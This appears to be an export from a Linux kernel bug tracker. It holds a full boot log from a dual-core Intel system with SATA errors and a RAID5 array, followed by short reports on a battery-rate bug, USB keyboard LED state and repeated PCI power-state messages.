Ok. Calibrating delay using timer specific routine.. 4802.70 BogoMIPS (lpj=24013539) Security Framework v1.0.0 initialized Mount-cache hash table entries: 512 CPU: After generic identify, caps: bfebfbff 20100000 00000000 00000000 0000e3bd 00000000 00000001 monitor/mwait feature present. using mwait in idle threads. CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 CPU: After all inits, caps: bfebfbff 20100000 00000000 00000940 0000e3bd 00000000 00000001 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Compat vDSO mapped to ffffe000. Checking 'hlt' instruction... OK. Freeing SMP alternatives: 16k freed ACPI: Core revision 20060707 CPU0: Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz stepping 06 Booting processor 1/1 eip 2000 Initializing CPU#1 Calibrating delay using timer specific routine.. 4800.12 BogoMIPS (lpj=24000649) CPU: After generic identify, caps: bfebfbff 20100000 00000000 00000000 0000e3bd 00000000 00000001 monitor/mwait feature present. CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 CPU: After all inits, caps: bfebfbff 20100000 00000000 00000940 0000e3bd 00000000 00000001 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz stepping 06 Total of 2 processors activated (9602.83 BogoMIPS). ENABLING IO-APIC IRQs ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1 checking TSC synchronization across 2 CPUs: passed. Brought up 2 CPUs migration_cost=792 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: Using MMCONFIG Setting up standard PCI resources ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) PCI quirk: region 0400-047f claimed by ICH6 ACPI/GPIO/TCO PCI quirk: region 0480-04bf claimed by ICH6 GPIO Boot video device is 0000:01:00.0 PCI: Transparent bridge - 0000:00:1e.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HUB0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs *3 4 5 6 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 *5 6 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 10 11 12 14 *15) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 9 10 11 12 *14 15) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNK0] (IRQs 3 4 5 6 7 9 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNK1] (IRQs 3 4 5 6 7 9 10 11 12 14 15) *0, disabled. SCSI subsystem initialized libata version 2.00 loaded. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report PCI: Bridge: 0000:00:01.0 IO window: 6000-6fff MEM window: f4000000-f6ffffff PREFETCH window: e0000000-efffffff PCI: Bridge: 0000:00:1c.0 IO window: 5000-5fff MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.3 IO window: 7000-8fff MEM window: f9000000-f90fffff PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.4 IO window: 9000-9fff MEM window: f7000000-f8ffffff PREFETCH window: 88000000-880fffff PCI: Bridge: 0000:00:1e.0 IO window: disabled. MEM window: f9100000-f91fffff PREFETCH window: disabled. ACPI: PCI Interrupt 0000:00:01.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:01.0 to 64 ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:1c.0 to 64 ACPI: PCI Interrupt 0000:00:1c.3[D] -&gt; GSI 19 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:1c.3 to 64 ACPI: PCI Interrupt 0000:00:1c.4[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:1c.4 to 64 PCI: Setting latency timer of device 0000:00:1e.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1048576 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered Machine check exception polling timer started. highmem bounce pool size: 64 pages JFS: nTxBlock = 8192, nTxLock = 65536 io scheduler noop registered io scheduler anticipatory registered (default) PCI: Setting latency timer of device 0000:00:01.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:01.0:pcie00] Allocate Port Service[0000:00:01.0:pcie03] PCI: Setting latency timer of device 0000:00:1c.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.0:pcie00] Allocate Port Service[0000:00:1c.0:pcie02] Allocate Port Service[0000:00:1c.0:pcie03] PCI: Setting latency timer of device 0000:00:1c.3 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.3:pcie00] Allocate Port Service[0000:00:1c.3:pcie02] Allocate Port Service[0000:00:1c.3:pcie03] PCI: Setting latency timer of device 0000:00:1c.4 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.4:pcie00] Allocate Port Service[0000:00:1c.4:pcie02] Allocate Port Service[0000:00:1c.4:pcie03] lp: driver loaded but no devices found Real Time Clock Driver v1.12ac Non-volatile memory driver v1.2 Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.0.1 20051102 ACPI: Power Button (FF) [PWRF] ACPI: Power Button (CM) [PWRB] ACPI: Processor [CPU0] (supports 2 throttling states) ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Ist] [20060707] ACPI: Processor [CPU1] (supports 2 throttling states) ACPI: Getting cpuindex for acpiid 0x2 ACPI: Getting cpuindex for acpiid 0x3 Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A parport0: PC-style at 0x378 [PCSPP,TRISTATE] lp0: using parport0 (polling). floppy0: no floppy controllers found loop: loaded (max 8 devices) e100: Intel(R) PRO/100 Network Driver, 3.5.17-k2-NAPI e100: Copyright(c) 1999-2006 Intel Corporation Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ahci 0000:03:00.0: version 2.0 ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:03:00.0 to 64 ahci 0000:03:00.0: AHCI 0001.0000 32 slots 2 ports 3 Gbps 0x3 impl SATA mode ahci 0000:03:00.0: flags: 64bit ncq pm led clo pmp pio slum part ata1: SATA max UDMA/133 cmd 0xF8CD4100 ctl 0x0 bmdma 0x0 irq 17 ata2: SATA max UDMA/133 cmd 0xF8CD4180 ctl 0x0 bmdma 0x0 irq 17 scsi0 : ahci ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata1.00: ATA-7, max UDMA/133, 145223999 sectors: LBA48 NCQ (depth 31/32) ata1.00: ata1: dev 0 multi count 0 ata1.00: configured for UDMA/133 scsi1 : ahci ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: ATAPI, max UDMA/33 ata2.00: applying bridge limits ata2.00: configured for UDMA/33 scsi 0:0:0:0: Direct-Access ATA WDC WD740ADFD-00 20.0 PQ: 0 ANSI: 5 SCSI device sda: 145223999 512-byte hdwr sectors (74355 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: drive cache: write back SCSI device sda: 145223999 512-byte hdwr sectors (74355 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: drive cache: write back sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 sda7 sda8 sda9 &gt; sd 0:0:0:0: Attached scsi disk sda scsi 1:0:0:0: CD-ROM TSSTcorp CD/DVDW SH-W163A TS01 PQ: 0 ANSI: 5 ata_piix 0000:00:1f.2: version 2.00ac6 ata_piix 0000:00:1f.2: MAP [ P0 P2 P1 P3 ] ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 19 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:1f.2 to 64 ata3: SATA max UDMA/133 cmd 0xB400 ctl 0xB802 bmdma 0xC400 irq 17 ata4: SATA max UDMA/133 cmd 0xBC00 ctl 0xC002 bmdma 0xC408 irq 17 scsi2 : ata_piix ata3.00: ATA-7, max UDMA7, 781420655 sectors: LBA48 NCQ (depth 0/32) ata3.00: ata3: dev 0 multi count 16 ata3.00: configured for UDMA/133 scsi3 : ata_piix ata4.00: ATA-7, max UDMA7, 781422768 sectors: LBA48 NCQ (depth 0/32) ata4.00: ata4: dev 0 multi count 16 ata4.00: configured for UDMA/133 scsi 2:0:0:0: Direct-Access ATA SAMSUNG HD400LJ ZZ10 PQ: 0 ANSI: 5 SCSI device sdb: 781420655 512-byte hdwr sectors (400087 MB) sdb: Write Protect is off sdb: Mode Sense: 00 3a 00 00 SCSI device sdb: drive cache: write back SCSI device sdb: 781420655 512-byte hdwr sectors (400087 MB) sdb: Write Protect is off sdb: Mode Sense: 00 3a 00 00 SCSI device sdb: drive cache: write back sdb: unknown partition table sd 2:0:0:0: Attached scsi disk sdb scsi 3:0:0:0: Direct-Access ATA SAMSUNG HD400LJ ZZ10 PQ: 0 ANSI: 5 SCSI device sdc: 781422768 512-byte hdwr sectors (400088 MB) sdc: Write Protect is off sdc: Mode Sense: 00 3a 00 00 SCSI device sdc: drive cache: write back SCSI device sdc: 781422768 512-byte hdwr sectors (400088 MB) sdc: Write Protect is off sdc: Mode Sense: 00 3a 00 00 SCSI device sdc: drive cache: write back sdc: unknown partition table sd 3:0:0:0: Attached scsi disk sdc ata_piix 0000:00:1f.5: MAP [ P0 P2 P1 P3 ] ACPI: PCI Interrupt 0000:00:1f.5[B] -&gt; GSI 19 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:1f.5 to 64 ata5: SATA max UDMA/133 cmd 0xD000 ctl 0xD402 bmdma 0xE000 irq 17 ata6: SATA max UDMA/133 cmd 0xD800 ctl 0xDC02 bmdma 0xE008 irq 17 scsi4 : ata_piix ata5.00: ATA-7, max UDMA7, 781422768 sectors: LBA48 NCQ (depth 0/32) ata5.00: ata5: dev 0 multi count 16 ata5.00: configured for UDMA/133 scsi5 : ata_piix ata6.00: ATA-7, max UDMA7, 781422768 sectors: LBA48 NCQ (depth 0/32) ata6.00: ata6: dev 0 multi count 16 ata6.00: configured for UDMA/133 scsi 4:0:0:0: Direct-Access ATA SAMSUNG HD400LJ ZZ10 PQ: 0 ANSI: 5 SCSI device sdd: 781422768 512-byte hdwr sectors (400088 MB) sdd: Write Protect is off sdd: Mode Sense: 00 3a 00 00 SCSI device sdd: drive cache: write back SCSI device sdd: 781422768 512-byte hdwr sectors (400088 MB) sdd: Write Protect is off sdd: Mode Sense: 00 3a 00 00 SCSI device sdd: drive cache: write back sdd: unknown partition table sd 4:0:0:0: Attached scsi disk sdd scsi 5:0:0:0: Direct-Access ATA SAMSUNG HD400LJ ZZ10 PQ: 0 ANSI: 5 SCSI device sde: 781422768 512-byte hdwr sectors (400088 MB) sde: Write Protect is off sde: Mode Sense: 00 3a 00 00 SCSI device sde: drive cache: write back SCSI device sde: 781422768 512-byte hdwr sectors (400088 MB) sde: Write Protect is off sde: Mode Sense: 00 3a 00 00 SCSI device sde: drive cache: write back sde: unknown partition table sd 5:0:0:0: Attached scsi disk sde ACPI: PCI Interrupt 0000:03:00.1[B] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:03:00.1 to 64 ata7: PATA max UDMA/100 cmd 0x7000 ctl 0x7402 bmdma 0x8000 irq 16 ata8: PATA max UDMA/100 cmd 0x7800 ctl 0x7C02 bmdma 0x8008 irq 16 scsi6 : pata_jmicron scsi7 : pata_jmicron ATA: abnormal status 0x7F on port 0x7807 ACPI: PCI Interrupt 0000:00:1a.7[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:1a.7 to 64 ehci_hcd 0000:00:1a.7: EHCI Host Controller ehci_hcd 0000:00:1a.7: new USB bus registered, assigned bus number 1 PCI: cache line size of 32 is not supported by device 0000:00:1a.7 ehci_hcd 0000:00:1a.7: irq 18, io mem 0xf9205000 ehci_hcd 0000:00:1a.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 4 ports detected ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; GSI 23 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 2 PCI: cache line size of 32 is not supported by device 0000:00:1d.7 ehci_hcd 0000:00:1d.7: irq 19, io mem 0xf9204000 ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 6 ports detected ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) USB Universal Host Controller Interface driver v3.0 ACPI: PCI Interrupt 0000:00:1a.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:1a.0 to 64 uhci_hcd 0000:00:1a.0: UHCI Host Controller uhci_hcd 0000:00:1a.0: new USB bus registered, assigned bus number 3 uhci_hcd 0000:00:1a.0: irq 16, io base 0x0000a000 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1a.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:1a.1 to 64 uhci_hcd 0000:00:1a.1: UHCI Host Controller uhci_hcd 0000:00:1a.1: new USB bus registered, assigned bus number 4 uhci_hcd 0000:00:1a.1: irq 20, io base 0x0000a400 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 2 ports detected usb 1-1: new high speed USB device using ehci_hcd and address 2 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 23 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 5 uhci_hcd 0000:00:1d.0: irq 19, io base 0x0000a800 usb usb5: configuration #1 chosen from 1 choice hub 5-0:1.0: USB hub found hub 5-0:1.0: 2 ports detected usb 1-1: configuration #1 chosen from 1 choice ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 19 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 6 uhci_hcd 0000:00:1d.1: irq 17, io base 0x0000ac00 usb usb6: configuration #1 chosen from 1 choice hub 6-0:1.0: USB hub found hub 6-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:1d.2 to 64 uhci_hcd 0000:00:1d.2: UHCI Host Controller uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 7 uhci_hcd 0000:00:1d.2: irq 18, io base 0x0000b000 usb usb7: configuration #1 chosen from 1 choice hub 7-0:1.0: USB hub found hub 7-0:1.0: 2 ports detected Initializing USB Mass Storage driver... scsi8 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 2 usb-storage: waiting for device to settle before scanning usb 5-1: new low speed USB device using uhci_hcd and address 2 usb 5-1: configuration #1 chosen from 1 choice usb 7-1: new low speed USB device using uhci_hcd and address 2 usb 7-1: configuration #1 chosen from 1 choice usb 7-2: new low speed USB device using uhci_hcd and address 3 usb 7-2: configuration #1 chosen from 1 choice usbcore: registered new interface driver usb-storage USB Mass Storage support registered. serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice i2c /dev entries driver raid6: int32x1 949 MB/s raid6: int32x2 896 MB/s raid6: int32x4 738 MB/s raid6: int32x8 591 MB/s raid6: mmxx1 3037 MB/s raid6: mmxx2 3521 MB/s raid6: sse1x1 2110 MB/s raid6: sse1x2 2730 MB/s raid6: sse2x1 3963 MB/s raid6: sse2x2 4390 MB/s raid6: using algorithm sse2x2 (4390 MB/s) md: raid6 personality registered for level 6 md: raid5 personality registered for level 5 md: raid4 personality registered for level 4 raid5: automatically using best checksumming function: pIII_sse pIII_sse : 8903.200 MB/sec raid5: using function: pIII_sse (8903.200 MB/sec) ip_conntrack version 2.4 (8192 buckets, 65536 max) - 176 bytes per conntrack ip_tables: (C) 2000-2006 Netfilter Core Team TCP cubic registered NET: Registered protocol family 1 NET: Registered protocol family 17 p4-clockmod: Unknown p4-clockmod-capable CPU. Please send an e-mail to &lt;linux@brodo.de&gt; p4-clockmod: Unknown p4-clockmod-capable CPU. Please send an e-mail to &lt;linux@brodo.de&gt; Starting balanced_irq Using IPI Shortcut mode md: Autodetecting RAID arrays. md: autorun ... md: ... autorun DONE. Time: tsc clocksource has been installed. EXT3-fs: INFO: recovery required on readonly filesystem. EXT3-fs: write access will be enabled during recovery. kjournald starting. Commit interval 5 seconds EXT3-fs: sda2: orphan cleanup on readonly fs ext3_orphan_cleanup: deleting unreferenced inode 94932 ext3_orphan_cleanup: deleting unreferenced inode 94536 ext3_orphan_cleanup: deleting unreferenced inode 93591 ext3_orphan_cleanup: deleting unreferenced inode 93553 EXT3-fs: sda2: 4 orphan inodes deleted EXT3-fs: recovery complete. EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 212k freed scsi 8:0:0:0: Direct-Access HTS54808 0M9AT00 MG4O PQ: 0 ANSI: 0 CCS SCSI device sdf: 156301488 512-byte hdwr sectors (80026 MB) sdf: Write Protect is off sdf: Mode Sense: 00 14 00 00 sdf: assuming drive cache: write through SCSI device sdf: 156301488 512-byte hdwr sectors (80026 MB) sdf: Write Protect is off sdf: Mode Sense: 00 14 00 00 sdf: assuming drive cache: write through sdf: sdf1 sdf2 &lt; sdf5 sdf6 sdf7 sdf8 sdf9 sdf10 sdf11 &gt; sdf3 sd 8:0:0:0: Attached scsi disk sdf usb-storage: device scan complete ACPI: PCI Interrupt 0000:00:1b.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1b.0 to 64 hda_codec: Unknown model for ALC883, trying auto-probe from BIOS... ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:04:00.0 to 64 sky2 v1.10 addr 0xf8000000 irq 16 Yukon-EC (0xb6) rev 2 sky2 eth0: addr 00:16:e6:59:d8:7b input: Logitech USB Receiver as /class/input/input0 input: USB HID v1.10 Mouse [Logitech USB Receiver] on usb-0000:00:1d.2-1 Linux video capture interface: v2.00 saa7130/34: v4l2 driver version 0.2.14 loaded ACPI: PCI Interrupt 0000:05:02.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 saa7134[0]: found at 0000:05:02.0, rev: 1, irq: 18, latency: 32, mmio: 0xf9101000 saa7134[0]: subsystem: 1461:2c05, board: AverTV DVB-T 777 [card=85,autodetected] saa7134[0]: board init: gpio is 2b800 input: saa7134 IR (AverTV DVB-T 777) as /class/input/input1 input: Wireless Keyboard/Mouse(2.4G) as /class/input/input2 input: USB HID v1.10 Keyboard [ Wireless Keyboard/Mouse(2.4G)] on usb-0000:00:1d.2-2 input: eGalax Inc. USB TouchController as /class/input/input3 saa7146: register extension 'budget_ci dvb'. input: Wireless Keyboard/Mouse(2.4G) as /class/input/input4 input: USB HID v1.10 Mouse [ Wireless Keyboard/Mouse(2.4G)] on usb-0000:00:1d.2-2 usbcore: registered new interface driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver usbcore: registered new interface driver usbtouchscreen saa7134[0]: i2c eeprom 00: 61 14 05 2c 00 00 00 00 00 00 00 00 00 00 00 00 saa7134[0]: i2c eeprom 10: 00 ff 82 0e ff 20 ff ff ff ff ff ff ff ff ff ff saa7134[0]: i2c eeprom 20: 01 40 01 02 02 03 03 01 08 ff 00 a8 ff ff ff ff saa7134[0]: i2c eeprom 30: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff saa7134[0]: i2c eeprom 40: ff 32 00 c0 86 1e ff ff ff ff ff ff ff ff ff ff saa7134[0]: i2c eeprom 50: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff saa7134[0]: i2c eeprom 60: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff saa7134[0]: i2c eeprom 70: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff saa7134[0]: registered device video0 [v4l2] saa7134[0]: registered device vbi0 ACPI: PCI Interrupt 0000:05:00.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 22 saa7146: found saa7146 @ mem f8cda000 (revision 1, irq 22) (0x13c2,0x1017). saa7146 (0): dma buffer size 192512 DVB: registering new adapter (TT-Budget/S-1500 PCI). adapter has MAC addr = 00:d0:5c:07:97:6e input: Budget-CI dvb ir receiver saa7146 (0) as /class/input/input5 budget_ci: CI interface initialised dvb_ca adapter 0: DVB CAM detected and initialised successfully sr0: scsi3-mmc drive: 94x/94x writer cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 1:0:0:0: Attached scsi CD-ROM sr0 ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) DVB: registering frontend 0 (ST STV0299 DVB-S)... ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for UDMA/33 ata2: EH complete ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for UDMA/33 ata2: EH complete ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for UDMA/33 ata2: EH complete ata2.00: limiting speed to UDMA/25 ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for UDMA/25 ata2: EH complete sr0: CDROM (ioctl) error, command: &lt;6&gt;cdb[0]=0x43 43 00 00 00 00 00 01 00 0c 00 sr: Current [descriptor]: sense key=0xb ASC=0x0 ASCQ=0x0 ata2.00: limiting speed to UDMA/16 ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for UDMA/16 ata2: EH complete ata2.00: limiting speed to PIO4 ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: (irq_stat 0x48000000, interface fatal error) ata2.00: tag 0 cmd 0xa0 Emask 0x50 stat 0x51 err 0x54 (ATA bus error) ata2: soft resetting port ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata2.00: configured for PIO4 ata2: EH complete EXT3 FS on sda2, internal journal Realtime LSM initialized (group 18, mlock=1) saa7134[0]: avertv 777 dvb setup DVB: registering new adapter (saa7134[0]). DVB: registering frontend 1 (Zarlink MT352 DVB-T)... usbcore: registered new interface driver usbserial drivers/usb/serial/usb-serial.c: USB Serial Driver core drivers/usb/serial/usb-serial.c: USB Serial support registered for FTDI USB Serial Device usbcore: registered new interface driver ftdi_sio drivers/usb/serial/ftdi_sio.c: v1.4.3:USB FTDI Serial Converters Driver md: md0 stopped. md: bind&lt;sdc&gt; md: bind&lt;sdd&gt; md: bind&lt;sde&gt; md: bind&lt;sdb&gt; raid5: device sdb operational as raid disk 0 raid5: device sde operational as raid disk 3 raid5: device sdd operational as raid disk 2 raid5: device sdc operational as raid disk 1 raid5: allocated 4204kB for md0 raid5: raid level 5 set md0 active with 4 out of 4 devices, algorithm 2 RAID5 conf printout: --- rd:4 wd:4 disk 0, o:1, dev:sdb disk 1, o:1, dev:sdc disk 2, o:1, dev:sdd disk 3, o:1, dev:sde kjournald starting. Commit interval 5 seconds EXT3 FS on sda5, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on sda6, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on sda7, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on sda8, internal journal EXT3-fs: mounted filesystem with ordered data mode. Adding 4000176k swap on /dev/sda3. Priority:-1 extents:1 across:4000176k</t>
  </si>
  <si>
    <t>Smart Battery System driver shows incorrect 'present rate' - Acer 2303LCi</t>
  </si>
  <si>
    <t>2007-01-29 04:15 UTC</t>
  </si>
  <si>
    <t>2007-03-08 01:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution:n/a Hardware Environment:Acer 2303LCi Software Environment:n/a Problem Description:Distribution:Smart Battery System driver shows incorrect 'present rate' field. a) Smart Battery System driver uses incorrect data to calculate 'present rate' b) 'present rate' is calculated in 'mA' units only. Steps to reproduce:</t>
  </si>
  <si>
    <t>2007-01-29 05:57 UTC</t>
  </si>
  <si>
    <t>Harrison Metzger</t>
  </si>
  <si>
    <t>2010-02-23 21:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Gentoo Hardware Environment: x86_64 (amd64) Software Environment: Problem Description: I have a dell monitor with a USB port in it and a logitech USB keyboard that connects to that hub. When the monitor is off it turns the hub off so the keyboard is disconnected. When I turn the monitor back on the numlock led (and f-lock because my keyboard has that) are off. However, if I type on the numpad numbers come out; numlock is still on, but the LED dosent show it. If I then press numlock it turns numlock off (and the light dosent change because it was off the begin with). Then if I press numlock again it turns on along with the light. Its like when the keyboard is disconnected and reconnected, its state is remembered (i.e numlock is on, caplocks in on), but it dosent set the LEDs. The LEDs are only set on a change. Don't know if its this way with a PS2 keyboard. Perhaps someone will test that out. This happens in X (kde) and in any VT. Steps to reproduce: Connect a USB keyboard. Turn on numlock or capslock. Disconnect the keyboard. Reconnect the keyboard. Type, you will see that the numlock or caps state is on, but the LEDs are off.</t>
  </si>
  <si>
    <t>pci_set_power_state(): 0000:01:08.0: state=3, current state=5</t>
  </si>
  <si>
    <t>2007-01-29 16:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: possibly 2.6.17?? Distribution: Debian Stable Hardware Environment: Dell workstation P2 Software Environment: Debian Stable Problem Description: Hi from 2.6.18 my dmesg gots full of mesages: pci_set_power_state(): 0000:01:08.0: state=3, current state=5 pci_set_power_state(): 0000:01:08.0: state=3, current state=5 pci_set_power_state(): 0000:01:08.0: state=3, current state=5 pci_set_power_state(): 0000:01:08.0: state=3, current state=5 Liboc01:~# lspci 0000:00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02) 0000:00:0d.0 ISA bridge: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II] (rev 01) 0000:00:0d.1 IDE interface: Intel Corporation 82371SB PIIX3 IDE [Natoma/Triton II] 0000:00:0d.2 USB Controller: Intel Corporation 82371SB PIIX3 USB [Natoma/Triton II] (rev 01) 0000:00:0e.0 PCI bridge: Digital Equipment Corporation DECchip 21152 (rev 02) 0000:00:10.0 VGA compatible controller: Matrox Graphics, Inc. MGA 2164W [Millennium II] 0000:00:11.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) 